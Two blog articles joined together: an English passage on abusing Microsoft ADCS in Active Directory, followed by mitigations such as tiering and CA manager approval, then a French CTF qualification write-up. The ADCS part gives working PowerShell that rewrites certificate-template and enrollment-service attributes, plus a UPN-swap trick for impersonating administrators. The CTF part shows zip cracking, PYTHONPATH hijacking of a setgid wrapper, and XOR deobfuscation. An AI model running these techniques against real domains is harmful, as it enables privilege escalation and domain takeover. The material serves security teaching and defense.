There exists another way of leveraging write access to user objects on the domain, however being much noisier and with a higher risk of breaking things.

If one already has an authentication certificate which includes the UPN of a low-privileged user, it will basically consist in modifying the userPrincipalName attribute of the target account to the value of that UPN. Such situations may arise when access to the enterprise Wi-Fi network is configured to be performed with a certificate, and with “user authentication” rather than “computer authentication”. In our case, we have a certificate with a UPN for User1:

User1 authentication certificate

Using the write access on the Admin1 user account, we modify its UPN to the one of User1:

Modification of Admin1 UPN

Finally, using our authentication certificate, it is now possible to perform a PKINIT pre-authentication for both user accounts, using either implicit or explicit mappings:

Authentication as both User1 and Admin1 with User1’s certificate

ACL exploit on certificate templates

If one of the already compromised assets in the domain has write access on a certificate template that is listed in one of the usable enrollment services, then the following modifications will allow the issuance of PKINIT-compliant authentication certificates:

• Set the msPKI-Enrollment-Flag attribute to 0: it will remove the need for additional approval set by the flag CT_FLAG_PEND_ALL_REQUESTS
• Set the msPKI-Certificate-Name-Flag attribute to 1: it will build the subject name based on the information provided by the requester
• Add the one of the required OIDs (for example 3.6.1.5.5.7.3.2) to the msPKI-Certificate-Application-Policy set to include the Client Authentication extended key usage

Such modifications can be performed through adsiedit.msc or via the Set-ADObject cmdlet from the ADDS Remote Server Administration Tools (RSAT) or with PowerView:

$newAttr = @{}
$newAttr['msPKI-Enrollment-Flag'] = '0'
$newAttr['msPKI-Certificate-Name-Flag'] = '1'
$newAttr['msPKI-Certificate-Application-Policy'] = @('1.3.6.1.5.5.7.3.2')

# Set new attributes
Set-AdObject "CN=TemplateName,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=LAB,DC=LOCAL" -Replace $newParams

ACL exploit on enrollment services

Similarly, write access on enrollment services objects can help the issuance of PKINIT-compliant authentication certificates. The attribute to be targeted is certificateTemplates since it allows the addition (or deletion) of listed certificate templates.

By default, there is only one certificate template with the correct PKINIT prerequisites in Active Directory, which is “Router (Offline request)”, but only Domain Admins can enroll a certificate with it.

However, the longer a PKI infrastructure lives, the higher the chance to find remnants of tests that will most likely be exploitable. As in the previous section, you can use adsiedit.msc or PowerShell to add a new template:

$object = "CN=LAB ROOT CA,CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=LAB,DC=LOCAL"


$templates = (Get-AdObject $object -Properties *).CertificateTemplates
$templates.Add("OfflineRouter")

Set-AdObject $object -Replace @{'certificateTemplates'=[System.Array]$templates}

Current mitigations

Integration within the Active Directory tiering model

ESAE: Enhanced Security admin Environment

In Active Directory, it is recommended to partition the administrator privileges according to the type of devices they need to interact with. The theory behind this partitioning of Active Directory is called the tiering model and is described by Microsoft in the Enhanced Security Admin Environment (ESAE). Though the ESAE model is now retired and replaced by the Rapid Modernization Plan (RaMP) to tackle the cloud aspects of hybrid information systems, most of its conclusions still apply regarding on-premise assets.

Tier-0

The idea behind the tiering model is built on isolation between assets in the information system. The most critical assets are in the Tier-0 and defined as:

• Any AD object that allows the compromise of the domain, therefore including the Domain/Enterprise Admins and (Enterprise) Domain Controllers groups
• Any AD object that allows taking over another object in the Tier-0, including, but not limited to: the krbtgt user, the OUs in which Tier-0 objects reside, the GPOs that apply to them, etc.
• Any asset in the Information System that can be used to compromise the Tier-0 or its objects: antivirus and EDR console, standalone WSUS servers, backup infrastructure, etc.

The Tier-0 is consequently defined as the set of assets that have control paths over each other but no other control paths from anywhere else: it is a closed loop in the compromise graph, that also includes non-domain-joint assets.

Tier-1 and 2

All the assets that are not present in Tier-0 are distributed in two other tiers. These tiers are built according to the type of objects they contain:

• Tier-2 contains everything closely related to standard users: their accounts, their workstation, but also TSE servers, the administrative layer that controls these assets, etc.
• Tier-1 is dedicated to hosting assets in relation with the applications: servers that host them, service accounts, administrative workstations (excluding Tier-0)

Tier permeability

The risk of intra-tier compromise is part of the tiering model’s design (even if some Active Directory mechanisms – such as the Protected Users domain group or LAPS – will limit it). However, the tiering model aims at protecting the most critical assets by strictly defining which inter-tier connection are allowed. The set of connections and their status is roughly detailed below:

In the previous diagram, the red arrows represent the impossibility for an administrator of a higher level of administration to open a session to a resource of a lower level. In addition, the yellow arrows indicate the need to limit inter-tier connection to user connections only (e.g. a domain user querying the LDAP service on a DC from his workstation).

The dedicated administrative accounts are to be created in each tier, and their session opening must be restricted to that tier to prevent escalation between tiers. Since the source device of a network connection is also susceptible to credential theft (keylogging, malware spying on memory, etc.), it is preferable that the administrative accounts in each tier are used from an administrative workstation only. This behavior needs to be enforced in the Tier-0, with the use of Privileged Access Workstations (PAW).

Moving ADCS objects up one tier!

All the examples of privilege escalation provided in the “Elevating privileges with ADCS” section consequently point towards the fact that the following AD objects need to be included in the Tier-0:

• The servers on which the ADCS role is installed
• The certificate templates that are published to a public accessible enrollment service
• The enrollment services if there are already certificate templates susceptible to exploitation

To facilitate the handling of these objects over time, it is recommended to include every certificate template and every enrollment service in the Tier-0. This means that there must be no control path over the three object types listed above from somewhere outside of the Tier-0:

• The owner and control ACL over the objects must be positioned on Tier-0 principals only
• The local administrator group of the ADCS servers must be restricted to Tier-0 principals only

Proper handling of corner cases

Context example

Even after the application of all of the recommendations listed above (when possible), there are still legitimate use cases of authentication certificates that needs to be issued to a third party. For example, when one wants to deploy Network Access Control (802.1x) with certificate-based authentication, there are four types of devices to consider:

1. The domain-joint devices, which will be able to use the enroll / auto-enroll features
2. The devices supporting the Simple Certification Enrollment Protocol (SCEP), which will be able to replicate the enroll / auto-enroll features
3. The devices supporting certificates with no support for any enroll / auto-enroll feature whatsoever (e.g. printers)
4. The devices that don’t support certificates

In the third case, network administrators would need to issue authentication certificates compliant with the NT_AUTH policy and including the Fully Qualified Domain Name (FQDN) of the device in the Subject Alternative Names (SAN) section. Since these devices are not domain principals and cannot enroll certificates with the ADCS server, the administrators are required to request certificates on behalf of the devices and to specify the name of the subject in the request.

This situation is the exact context in which the administrators would also be able to issue an authentication certificate including the UPN of a domain administrator in the SAN section, therefore being able to perform PKINIT and authenticate as the domain administrator.

Setting the manager approval

To protect against the malicious use, the certificate templates objects include an option to require the approval of a CA certificate manager:

CA certificate manager approval

When the request for a new certificate is issued, it will appear in the “Pending Requests” section of the ADCS instance, using the certsrv.msc MMC component:

Pending certificate request

The certificate can later be retrieved by the requester with the following commands:

C:\> certreq -retrieve <ID_REQUEST> file.cer
C:\> certreq -accept file.cer

Choosing your CA managers

There are multiple strategies to select who should be able to validate the pending requests, at the ADCS server level:

• Since the issuance of a malicious certificate allows the compromise of a Tier 0 principal, the ideal solution would be to only allow Tier 0 principals on this role; however, this may complexify the issuance process at a large scale
• The alternative is to enable Tier 1 administrators to perform this action: in this case, the groups allowed to request the certificate need to be completely disjoint from the groups allowed to approve the requests. Note that even in this situation, control over accounts from both groups is sufficient to take over Tier 0 principals

Alternative to Tier-0 validators only

Adding the detection layer

The extensive guide about adding an ADCS logging facility would not fit in this article. However, there are some useful resources about how to enable logging and what to log:

• An introduction to Golden Certificates (by C. Falta): the “Defending against Golden Certificate” gives very interesting insight on how to monitor the certificate template changes, which would certainly help in detecting some ACL exploits
• Securing PKI: Monitoring Public Key Infrastructure (by Microsoft): this article is the reference regarding the configuration of ADCS logging and provides information on what event IDs are raised when specific events occur

Special thanks to @RémiEscourrou, @ClémentNotin and @Pixis for their help on this subject,
and stay tuned for @harmj0y‘s presentation at Black Hat US on this topic!

Cet article Microsoft ADCS – Abusing PKI in Active Directory Environment est apparu en premier sur RiskInsight.

• Niveau technique avancé
• Accessibilité géographique
• Événement à taille humaine

Web-serveur : la simplicité (par ShrewkRoot)

Le site se présente sous la forme d’une page blanche contenant une vidéo du rappeur Orelsan :

 

 

Le premier réflexe à adopter dans ce cas est de s’orienter sur la cartographie de l’application : scan de ports, scans des dossiers, etc. Le challenge interdisant explicitement le bruteforce en ligne, ces solutions ne sont pas appliquées ici.

En revanche, deux fichiers sont souvent présents sur les applications web et permettent de découvrir tout ou partie de l’arborescence d’un site :

• /sitemap.xml : fichier XML contenant l’arborescence des différentes sections
• /robots.txt : fichier txt visant à interdire le crawling de certaines sections aux robots

En naviguant sur le second, l’application indique que le fichier backup.zip existe :

Le fichier backup.zip est bien accessible, et une fois téléchargé, demande un mot de passe pour l’extraction :

iansus @ iansus-server ~/rtfm/quals/simple % unzip backup.zip
Archive: backup.zip
[backup.zip] index.php password:

Il est facile de procéder au bruteforce de ce mot de passe à l’aide de la liste rockyou.txt (présente par défaut sur Kali Linux) et de l’outil fcrackzip :

iansus @ iansus-server ~/rtfm/quals/simple % fcrackzip -D -p rockyou.txt -u backup.zip
PASSWORD FOUND!!!!: pw == passw0rd

iansus @ iansus-server ~/rtfm/quals/simple % curl -X POST http://iansus.net:4444 –data ‘h1=1539722573.8918’ -s | grep sigsegv
h1 vaut: 0e633901513385170308561908425699</br><!–Bien joué le flag est sigsegv{a1a29afa647a20758e64b49d8eb453f4}–><!– Si une méthode ne fonctionne pas il faut en utiliser une autre –>

App-script : Fun avec Python (par laxa)

iansus @ iansus-server ~/rtfm/Qualifications-2018 % ssh -p 4443 chall@iansus.net
chall@iansus.net’s password:
Linux 4e5d88350bfc 4.9.0-8-amd64 #1 SMP Debian 4.9.110-3+deb9u4 (2018-08-21) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
aaaaaaaaaaaaaaaaaaaaaa
chall@4e5d88350bfc:~$ ls -l
total 16
-r–r—– 1 root chall-pwned 21 Oct 16 17:13 flag
-rwxr-xr-x 1 root root 307 Oct 16 17:13 hello-world.py
-rwxr-sr-x 1 root chall-pwned 6304 Oct 17 17:18 wrapper

#!/usr/bin/python2.7
from colors import colors
def main():
print(‘This is an advanced hello-world’)
print(‘The world is more joyful with colors’)
print(‘So, here we are:’)
print(‘{}Hello-World !{}’.format(colors.bcolors.OKBLUE, colors.bcolors.ENDC))
if __name__ == ‘__main__’:
main()

chall@4e5d88350bfc:~$ python2.7
Python 2.7.13 (default, Nov 24 2017, 17:33:09)
[GCC 6.3.0 20170516] on linux2
Type “help”, “copyright”, “credits” or “license” for more information.
>>> import colors
>>> colors.__file__
‘/usr/local/lib/python2.7/dist-packages/colors/__init__.py’

class bcolors:
HEADER = ‘\033[95m’
OKBLUE = ‘\033[94m’
OKGREEN = ‘\033[92m’
WARNING = ‘\033[93m’
FAIL = ‘\033[91m’
ENDC = ‘\033[0m’
BOLD = ‘\033[1m’
UNDERLINE = ‘\033[4m’

• Avec le nom du dossier contenant le script Python exécuter (les liens symboliques sont résolus)
• Avec la variable d’environnement $PYTHONPATH
• Avec le dossier d’installation par défaut des scripts

#!/usr/bin/python2.7
print open(‘/home/chall/flag’, ‘r’).read()
Il est alors possible de récupérer le flag comme suit :
chall@4e5d88350bfc:~$ PYTHONPATH=/tmp ./wrapper
sigsegv{un_flag_ici}
Traceback (most recent call last):
File “/home/chall/hello-world.py”, line 3, in <module>
from colors import colors
ImportError: cannot import name colors

Web-client : Javascript Obfusqué (par Synacktiv)

Description : Le javascript est populaire de nos jours, serez-vous capable de retrouver le flag ?Le challenge se présente sous la forme d’un fichier HTML qui contient un formulaire pour vérifier le flag :

<html><SCRIPT LANGUAGE=“JavaScript”><!–
document.write(unescape(“%3C%53[..snip..]%54%3E”));//–></SCRIPT><SCRIPT LANGUAGE=“JavaScript”><!–
hp_d01(unescape(“%3E%23//JGCF[..snip..]%23//-JGCF//%3C”));//–></SCRIPT><NOSCRIPT>To display this page you need a browser with JavaScript support.</NOSCRIPT>
</html>

Il est en général possible de rencontrer deux types d’obfuscation JavaScript :

• La première construit un code qui sera désobfusqué et exécuté grâce à la fonction eval()
• La seconde construit un code qui sera désobfusqué et exécuté en l’ajoutant dynamiquement dans le code de la page, par exemple via document.write()

Ce challenge utilise la seconde méthode, et le code final peut donc être récupéré en utilisant l’inspecteur HTML de Chrome / Firefox / Opera :

Le code complet de la fonction JavaScript est le suivant :
<script language=“JavaScript”>
function Kod(s, pass) {
var i=0;
var BlaBla=“”;
for(j=0; j<s.length; j++) {
BlaBla += String.fromCharCode((pass.charCodeAt(i++))^(s.charCodeAt(j)));
if (i>=pass.length)
i=0;
}
return(BlaBla);
}
function f(form){
var pass=document.form.pass.value;
var hash=0;
for(j=0; j<pass.length; j++){
var n= pass.charCodeAt(j);
hash += ((n–j+33)^31025);
}
if (hash == 529387) {
var Secret =“”+“\x4f\x01\x13\x1e\x09\x59\x34\x09\x0b\x05\x26\x53\x31\x41\x5a\x18\x0e\x53\x1d\x15\x1c\x10\x11\x13\x5b\x06\x16\x69\x15\x29\x55\x1d\x55\x5d\x06\x1d\x0e\x1f\x0c\x14\x13\x5b\x06\x16\x69\x1e\x2a\x40\x5a\x1d\x18\x53\x19\x06\x00\x16\x02\x56\x0a\x1f\x16\x69\x07\x30\x14\x1b\x0a\x5d\x07\x1b\x08\x06\x13\x02\x56\x0b\x05\x06\x3b\x53\x33\x55\x16\x10\x19\x16\x1b\x47\x1f\x00\x47\x15\x13\x0b\x1f\x25\x16\x2b\x53\x1f\x45\x52\x1b\x1d\x0a\x1f\x5b”+“”;
var s=Kod(Secret, pass);
document.write (s);
} else {
alert (‘Wrong password!’);
}
}
</script>
Les première analyses du code indiquent que :

• La fonction Kod consiste à réaliser une opération XOR entre une chaîne et une clé, cette dernière étant répétée si plus courte que la chaîne à chiffrer
• La fonction f est appelée sur validation du formulaire et :
  • réalise une vérification sur la clé entrée dans le formulaire (variable hash)
  • déchiffre la variable Secret à l’aide de la clé pour l’afficher sur la page

Il s’agit donc ici d’un problème de cryptographie, et la première étape consiste à trouver la longueur de la clé. Bien que des analyses statistiques soient possibles, une méthode plus facile consiste à utiliser le calcul de la variable hash pour évaluer cette longueur.

Cette variable est la somme des (n-j+33)^31025, n étant le code ASCII du caractère et j sa position. Ces éléments sont globalement bornés autour dans l’intervalle 30000-32000. Il est donc facile d’approximer la longueur de la clé via Napprox = 529387 / 31000 = 17.077

, soit 17.

“\x4f\x01\x13\x1e\x09\x59\x34\x09\x0b\x05\x26\x53\x31\x41\x5a\x18\x0e” +
“\x53\x1d\x15\x1c\x10\x11\x13\x5b\x06\x16\x69\x15\x29\x55\x1d\x55\x5d” +
“\x06\x1d\x0e\x1f\x0c\x14\x13\x5b\x06\x16\x69\x1e\x2a\x40\x5a\x1d\x18” +
“\x53\x19\x06\x00\x16\x02\x56\x0a\x1f\x16\x69\x07\x30\x14\x1b\x0a\x5d” +
“\x07\x1b\x08\x06\x13\x02\x56\x0b\x05\x06\x3b\x53\x33\x55\x16\x10\x19” +
“\x16\x1b\x47\x1f\x00\x47\x15\x13\x0b\x1f\x25\x16\x2b\x53\x1f\x45\x52” +
“\x1b\x1d\x0a\x1f\x5b”

#!/usr/bin/python
import sys
def xor(a, b):
return ”.join([chr(ord(c)^ord(d)) for c, d in zip(a, b)])
blocks = [
‘\x4f\x01\x13\x1e\x09\x59\x34\x09\x0b\x05\x26\x53\x31\x41\x5a\x18\x0e’,
‘\x53\x1d\x15\x1c\x10\x11\x13\x5b\x06\x16\x69\x15\x29\x55\x1d\x55\x5d’,
‘\x06\x1d\x0e\x1f\x0c\x14\x13\x5b\x06\x16\x69\x1e\x2a\x40\x5a\x1d\x18’,
‘\x53\x19\x06\x00\x16\x02\x56\x0a\x1f\x16\x69\x07\x30\x14\x1b\x0a\x5d’,
‘\x07\x1b\x08\x06\x13\x02\x56\x0b\x05\x06\x3b\x53\x33\x55\x16\x10\x19’,
‘\x16\x1b\x47\x1f\x00\x47\x15\x13\x0b\x1f\x25\x16\x2b\x53\x1f\x45\x52’,
#’\x1b\x1d\x0a\x1f\x5b’
]
pw = sys.argv[1]
for b in blocks:
print ‘[-] Ref is %s’ % repr(b)
for i in range(len(blocks[0])-len(pw)+1):
print ‘[-] At pos %d’ % i
pk = xor(b[i:], pw)
print ‘[-] PK = %s’ % repr(pk)
for b2 in blocks:
if b==b2:
continue
print xor(b2[i:], pk)
print ”

Cryptographie : Un nouveau dialecte (ShrewkRoot)

iansus @ iansus-server ~/rtfm/quals/js % echo -n ȃǹǷȃǵǷȆȋǜǑǣǤǕǗǑǓǕǣǤǠǑǣǣǙǖǑǓǙǜǕȍ | hexdump -C
00000000 c8 83 c7 b9 c7 b7 c8 83 c7 b5 c7 b7 c8 86 c8 8b |…………….|
00000010 c7 9c c7 91 c7 a3 c7 a4 c7 95 c7 97 c7 91 c7 93 |…………….|
00000020 c7 95 c7 a3 c7 a4 c7 a0 c7 91 c7 a3 c7 a3 c7 99 |…………….|
00000030 c7 96 c7 91 c7 93 c7 99 c7 9c c7 95 c8 8d |…………..|
0000003e
On constate alors rapidement que les caractères s’écrivent sur deux octets, et qu’ils se présentent tous sous les forme c7 xx ou c8 yy. Par ailleurs, en supposant que le texte décodé commence par sigsegv{, on remarque que :

• La 1ère lettre (s) et la 4ème lettre (s) sont codées de manière identique (c8 83) : il s’agit donc probablement d’une substitution monoalphabétique
• La 5ème lettre (e) et la 7ème lettre (g) ont respectivement pour valeur codée c7 b5 et c7 b7 : le décalage entre deux lettres est constant, il s’agit probablement d’une variante du chiffre de César

Description : Faites-moi confiance, XOR n’est pas la solution.

Le challenge se présente sous la forme d’un binaire ELF 64-bit strippé. Ce writeup utilisera Cutter, l’interface graphique de Radare2. Les première étapes sont assez simples, puisque la fonction main ne possède qu’un appel à une autre fonction :

 

 

Si l’on tente d’afficher le graphe de la fonction située à 0x004009e0, l’erreur suivante se produit :

Il s’agit là d’une technique anti-reverse, que l’on peut observer plus en détails dans l’affichage linéaire de Cutter :

 

 

Ci-dessous le détail des instructions :

• push rax : sauvegarde la valeur courante de RAX sur la pile
• xor eax, eax : remet la valeur de EAX à 0
• test eax, eax : teste si la valeur de EAX est nulle et fixe le flag Z à 1
• pop rax : récupère la valeur sauvegardée de RAX depuis la pile
• jne 0x4009ee : saute à l’adresse indiquée si le flag Z vaut 0 (non pris)
• je 0x4009ef : saute à l’adresse indiquée si le flag Z vaut 1 (pris)

Seulement, les instructions à l’adresse 0x4009ef ne sont pas désassemblées puisqu’une instruction jmp commence à l’octet précédent. Le saut à l’octet précédent n’étant jamais emprunté, il est possible d’ignorer cette instruction et de demander le désassemblage à partir de 0x4009ef.

Pour cela, un clic-droit à l’adresse 0x4009ee fait apparaître le menu suivant :

Il est alors possible d’observer le code qui devrait être normalement exécuté :

En analysant plus précisément le binaire, on se rend compte que ces techniques empêchent simplement le graphe de flot de contrôle (CFG) et que le désassemblage reste intact.

L’analyse était donc simplement possible en ignorant ces bouts de code invalides. Il est alors facile d’identifier la fonction qui gère le flag, sub.BB_7c2. Bien que des astuces anti-reverse soient également présentes, les lettres du flag sont clairement visibles :

Le flag récupéré est alors sigsegv{W3llPl4y3d}.

Cet article [CTF] Writeup du round de qualification SIGSEGV1 est apparu en premier sur RiskInsight.